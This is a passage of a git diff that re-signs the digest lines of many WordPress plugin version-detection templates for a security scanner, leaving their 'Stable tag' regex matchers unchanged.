'(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022064598f7718c3d3899a25311e1903c2fd76e1da305f2eff0ac8b78855fd51c83702204141b1276c47ff94c02583139e31636adbcdb8c213dd0e16c0eb89491cb87ca4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047f2be156ea482fbfd2daf7a3211df03e2b903caee0acec1742ea9e3086fc4bf022100d3160d79d0cc82f4991ed29fdfc81ff7304525ee95fdaa3a9a44187d031da839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 4110699977..02b1182e2f 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a409feb9213cd9901e532805c3ca7e434106b94d831fd8acd5e096cff36b88ab022100e9a23b119d945d0fdd0d3952038a6b310794c24eea084afeb5444d610bfc6141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e53de881ab7f932a84b5cb16cf9bebde39cbfb36eac5c1daccb4893897b6e8290220020c6844894c40d8ad0f8efdf617127a0942dfdd2e0adbc357d8cbe3c1f1d6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 83fbdb379c..a47cf26c37 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220528e89ee0ccc688d583da922f321bedccbec5925b2db36806fe6468497f2032f022100dd990d75eb62df6b196ab7a1d050222a7f6c02dd8be80df08e03f0db5d60d2b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220206114c6790e05205a788fb90daefab710b84d76b7155e96167e9fc49fccbcf7022100e937bbc5070e7a2cad5caad7b6ba077af9455059944f223535e79c076e1aae6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 80a05852dc..07e82cbc30 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022043a480741bd31248b2cb45fed069ab0643de0524e12970b798c6f6d4cd4c8c9f022100ca2b1da0a6ca4d7d3011e3ba838093fabadd707b94fce08b198f69f4eab76084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220268204d0963f43aeeb488904a917cd171c1613ceceafa8818b87aecf2bc505ab022100ddae2d130e0d0ec4214ac40362171fd69d32a942794319e7fa1d5c324f2d5646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index fb822c293c..deabafef8c 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 480a004530430220619b56fa96066288e11319ca3855ecfd502c235e4b547b607ea6f4a4af288733021f34d1531efea2876635ba537eff9be8ae615f8bf0992903c891c6c98bcc6f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdce90056e83b298b2f22a54b01d61493f9098008ef51e143894c941c837ba7a022100e40228596677994979533a8e3873578ffba6d0b6d6a67366351cb91f16f819c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index c37babc59e..21622d01c6 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e5265e63ae626236f870a7fb122d39372f6425f0b3d38ba7c07a23bd9c68ef870220204a55d1bb48d6612a5464200de525dc0067488ac03bd83a8502af99b31963f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc2bb8941482ea96a51f69be558b8afdf833f57cf1524b78520c5655a183491d022100c3a536098d44b2d53848143f4b23bcfe3821014b63d947b513f27a731198690e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 5ff932a606..77c54e975a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201d3ffcb3d4a4d3bc4679bf08f68794c52f16e5aa454f95364cd7b867c8249c90022100b3b4ab41d65a8458f3438192c895c01ebdb528f04a48d54e97fa628211a7033e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d8f846fc29013280f6de8ee077e7f4d40a3b02af9bce134a955e5b578bb79d7022100da6931cfa77e3e0b0acb3f70bf39b15da416d838d3b811eb840ceaeccf7bb7ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 63d34e6445..ea12128afc 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d15e2084fbf368b2ec133d5f735477f18f65768693515903856cf4e992a164910220227de23531a12919771a1c24fc5a247df467f0d2c769712da63a16f7c85c114d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206357be35265bc58da7b8513c99f4fc403dadcb0b2e4a8467807bd30944e7458d0220044dcafb8273dcd00b2418622891815f25bcbecad97118e72f3b60567148741e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index c9e7d9410e..da0907edc2 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d7b4c563bccfe3ed176dffa25900d6c07ae47350bec873e4882939ad7bc9483c0221008459d92ea6ad8bbd0c8f715597f3de1f1aa180b9ace7430776719edd0a4bdf80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dcd8dc73de32b95592bd6461bbac45ae3722312c891d1388c824cf498b49ac8e022100d86916d7860a9e5bf7db94b4406434338c3aa02040564107a9457fdb73e20c4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 27f5213500..dc2990b4bc 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022068575af38fc807a0b0e6ef9cd49944f6a859aa39978692507606921f67f447a3022100b03f06e754823ae8eab0086b10c8e4a71862d71adfd4e537aa48b5158d04a09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ab079f19f28b2073022b62543a5f88a7e76812acee448be592d6f2c48d2e95d022100aa858048af3c40cb3e21917a516a132e8ba14f5f0bc6ce9f5e170bb61a4c350f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 994fc5ed4d..5ad7d22cf5 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022023609ca51bdb3fc40dbdeee9d67720eb36fecef2205cc95690d443336ffc8f39022100e1b6f5ffccc0953be53b9785ad459ff31f2c346f601932815c86d0e5cb2dd6e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d231d1494b2ddeae0371f622f52767241928f13da295b3ff5e6722de3d2a9c5c022100fa44daec618280895b6f5434860267df1cf3084624ca4b174b0d360417861078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 1d69805805..bcca1f0e73 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008959dfefcee035e8a8f8ee4e2b35d3a7b7bd7496be5bd914e63e16c1e879bf4502207b5ef7c1b28bac9820bd8ab11a5c61eedfd73fffa1993f4fe336012c24632e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203df3f0a3febb9843dbcc673e0c4f7b6fe5027a5a78580093c2b503c85ed26a8002210081c7886f9dc3908ec5a3b15ca6400cbb733092a582b817d4083173345eb5cc2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 6e3075279d..7c9f890054 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201b7193ae91903f1b8e81bb52f49d50c62473a4f7c3c3d4819ca521c56d5c8f2602201594ce7c416f99aeafd7ded4253e00561cd94a22511d67373741ec1073723179:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022042baf1831b137aa5d60ef77668b8f081e61410c6d4e89a27237f8c832c8dfc47022100c2d3073dda0817fef080112a0ec472195babf3d8a03f204e0e808be3e43998e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 4016bf3c26..33be0438c8 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d46cbeb9903028ef87856f7a1313609bd11d2010b9247e60b86bd194ccfe55530221008cbe859d256a4f19c8d3ca650b84c476f4d56c2f64af65bb794121fc3a861bba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a9d520e228b76e3bd228c75460de73bfe10d1d79823fc360ab6a20415203bfe202200d861adb2fff5aa3601d2d37dc5635759eb2e6111e0d4a65f5f01d7f1b028ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index cac8b54b28..5fc5700064 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205a7353bc388617840a2fa6c79e4ea5b84a4bbbd4b92c539653aa358a78e1a877022007b8cd310b25deb35c4aa9a18cd962909a28b8f2ff07b01a11526e6173480f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eab9f385c2f95fa917e810b1a6d364acf986c26ebbcf63cd52f5931bf16b0533022100f49457c48630af26bad99e0f61f0d5a892f32aaec368d57debbd743ab82048a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index e9d6b554b2..9b3d3fc5c8 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022044ef88e2b0066d02ae4a0d672597e72a9a4c48e2a3d25fd900e20e214e25c14a022100f781247deff7a4b6f3ba4576f3f4d9c11b386c1ece873d5a55eeb449cffc4e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2a1d7cbea0b605cc24a23180ebdae3adf1752e414401fde71522c228f391d8202202984b7c985de0d3f87b3c6f158c4fe894c2574103fa67a328cb2cbfa98ecea4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index f85f658d38..b8c8348ad1 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e6895c218271c0d4ee38fced9ac2e68a8c2c755672d224ed77b14b289d39a81c022100dbe206fd4e656b8c7a57d66ca2faf81f4c9b4f7ca632e6a83b0b11306cf49892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220273d92f83b09ea4a668838a70414eb5988f6cd3a09e845ea9da96a3cf7310d8a022100d2a8e19a5c44451305caefc72a42e57ac7557b4beaaa7689f292cfdb9fadda18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index a3d3ee7c21..742a94ec68 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203e2050807031025a06f8961c83bc69b583fb3f9624c9584c5958d6aa917be60b02206ec8ae0228ed0313c87f3dcc6c078a39f0e1525a8b649ed4055251d454d48934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f306bace7f969e974e16f5acde4385e00bc1f0967494aec153fa8fba3c54e2702205e8e61bec50d044b98302b65d8c045a6b00ec15b0957549052448ee5396a5482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 601272aef9..a732a0a87c 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100be53c33c8be0b5eed48addc3f0f78a7e63ed11b0208a5eb322b0c485eadd7fd2022013d2893f2a4b86c5323ac8fba0650faf39e3a15af46a62b68295eff3465de91f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207629ff2dc032ccfba4e7d91d73a6d5462e23b54d7b0c55fd112f72e6484b19f6022100e3bf8fd4f56de4140cc0a29db44b85f41a03cf7192bc712f15736f5829f31c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 9bebf2aa6c..d396a6bacb 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220491e79f8f8cab7441869eca9c6e462fe52ccd63a4383783474b6335c1e5e74d5022100c41084bd102542aa2495e89852887b72e1b3adf97c70480b8984486ec2ebb971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203b5c90e2ab57ee6be9a68c73a6d814c77a9deb8062bc5c54c9cd71e2cfcdb4ac022100bdba3b7be77b3a0e56c0a6c504a8d636339c9e88f75c20a33fad3d1c0afe1e46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index c3d31b48c3..bb962b75ae 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220525a742a0e05a8e9a35a6363549c602b2480ad874af4cd176719d01510c497d602203943aa9b14492b019a6a27519f7f7238f64284a68969bb1d7216b9c5817fa314:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e667d59dad80c4c2ee459a5642fba4cc5ea63bc9f7777ff1c738a76ea9072a5202205ca9b8b6815552dd51ea3bfd7e88484ffbae2cd038693b755ed1a952c738423d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index d07d82d93b..09d31df43f 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220663377cae9d8c8b80a99543db1a182c02fb0e6944685a17cce6c79a73e3c5349022100a543f3cd2cfc2d46f14541e6b7b37393713afa112e71b5740095b9eaf0caefdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022010e1b82d3c69591d1aebca1b9aed021ef06e84adf42ccf46a9c92557efb8081302210080f57ee5a78828e128da418574eaa358139a7dd946c2b6932983ba50fc9edc83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 70022d453c..2efacc871e 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d9b9d9ac299ad31af342a485fea9bc0089f773133dfbc35993a85fde31b85a890220617fc37cd28e13e6ef2f8f29b9501021f0fb67e2c1f2f9749f9e9a5df11f9a0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098b9377226068ffb7c748c6879d48b59f538cee26be09d357bbdac4327554f08022100e49922b27c1c8843f3b4e33b91e430d42c65b71d5573729755ace0dc8bec381b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b06025bd71..efe2793811 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200114b273fae2b23db3a04342627951959e34c286145c560bdccc8116ac4765d3022100a658ab09594a8a4ebbd36b158ec5eecebb7ce6f2ff8fbe536e0a72f928c3f9dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000a10d52a6e46be4e5f061c0d4fe88a327e19b8f3584097cc74cd2301bc6aed1022037fdedf0186dd491cba7d0f70da6063595a43a7fcd6e23c433eec06ef9b5b3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index ead3bde1a5..c5ec00345a 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022020409c97d9c6112784e92af9260712e29f46e850666bec28d9f64f8c0e9b6969022023790f2d622047d8c2f8bf341a1d790b6566334fd19eef2ade5ba2a74c3a246e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f86d88a04b20b6be38883b40472fe510461d9e28597580ffa1a29bb074b6477402207d48b770bf6b44d99d412492ed3a86a90bb8d54081f3a18ffe817ba0fd9f3ffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index b35dfa2686..e606336064 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d6faed27620d23594abb234ae43c42cdff06339c3ae0cee244cc4b91cac4d56d022100a49464197a0e647ed7f98c37734c8fc1be59d25fa75eeecfc9d707094a8f0d78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ec83b4c8f7eb748fbb1ce9f39d5c1851dfc261814a7177740601bfe091a5e7d02207db2e46562c36032dd14134b4f1e6cb26005e4466c4c4388eaea304d87179ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 595cecfe3b..c9acf5bf64 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f84c6ca4ad1c394ba1a0cc18f0b21be6eb7282c0debae1e268781d6b9830d995022100f83621e43d68e441ad073c706c5a57163c78be57362036695fb4d132081434a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022052d00a64369c2239ab12056021d1bf4cb5a68c3bd592d392e7ac674c4a11571e0221009835500b46b9536538002d75fa05ad550627bd0c2d30f630b97a2a57655839d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 79d3d9f007..909db4b234 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220713beae31bf8e44d3700d0151f03c96f3f1d73e741c2fe4d4bccaf3733f3902d02210088eb6c90cec2ab8bd3a9e8811202fd1b597b1e268b6ddc02fe1cafbcc192a5c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220557e8c80f1a26385f636ae0de81d2608a1237f52f139a0e8d95a6e7de196401f022100c57f4e679401a7a7e33683c6ef1055a5d7947b6df35bb4d5f8fd4caa4b3ba4ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index c8d685654c..37dcc1761b 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008d602567e517fae231869913b325551872d37178ef95b6cb9c78672482a4f09e0221008878b4c1253c38ba8dcbe8d24ec968bf8a3545b359803996f20f28b22df368ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203c4d3bd3692ef3f70eb6677cb5a0597722a2115cd2323394f08958ef2fcff6590220522ff2c5952804754aa0f08df81e4bf499d2c23b7a990f5d4cc51c7d261c45e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index f2d7f111b7..270c3f08a8 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d7069c6468f6f811bca4d8c21575b02c3bc6418c2eaa49d79c0cff7cb882897d02206b101f1f897acef7ec40a3b85e97213e1979adb1a11ac8424338c152c0329487:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce30d899682f9ad2c3ebfa0599780728c0383a910d34676dad73eaf61c5f97e302210080f03155fabd5e592fe80feeccf70f75a7c3d3f2880b425d98e64ae25df30eac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 882fec1018..1f1045c962 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009f3154062fb529de2fb5ac5a0540c36ad4705b1fff9e9ffe0d0973cdc2c171930220385f26e1af8c5ae5d5324c429587845ef9d69f7bb180f0eb459c5ed0a9a9f39e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220524737180dac5948341d7d203e8253d6fc49920b452415b1dcf65499b63a438002200ac8c159aa52c9f852e827541e58078fb4e9d2038ae43940c7af736ca9e952e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index e95e9906c9..9bf0615c21 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008477c377d8b886fa5fe1396cdd511ca8152de100a176af23629b145fbe7b8d1f022100cff8be5bb1f25301c62b2437f1f0ea628b064be3e9740afa1d7918720df8349a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027782998e28ed10238a6c56396694f314f2019120bdc833ce89ad1297c1d2b0d02205319e0eaf42564b7632d86c8cb38ec798d9fbb8619a017a3f00c1f0e8a37dcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 2e2b65f979..2cf6d15792 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b16122fd32693803e056d0ca41f2cb87ffe7645a8ab711bbba9f5d5dbfdf6e3402203b868f928156cd6667a8fc966526cbb70116917ee39064cd36c1ad3be5a4b6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf39538eeb12617d7b108e615c39d7146ad0ecfe61b9745e40b67e9307f68218022100b12bf7fcf4e4e24479add6e52444ffe3d2d7470ef794c85cf3598137506efe9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index d8b8221216..147ddb4faf 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204b9da61bff95911bad7732bd117b28d47ec40b913276e0f9717e3146bdd5238a02203bf84c90b56fb7968cca8df0734e1041f62cac19aa5a843ed388e736e5c4e841:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220747d240ebf4c1dfe3fc417be3ed321c17a02d9d88ee62c354537cebe3cef7b1d0220251e288124c0ffa24d25bc826fb567cad78d7d258dd64aa99ef344be8f744d49:922c64590222798bb761d5b6d8e72950 \ No 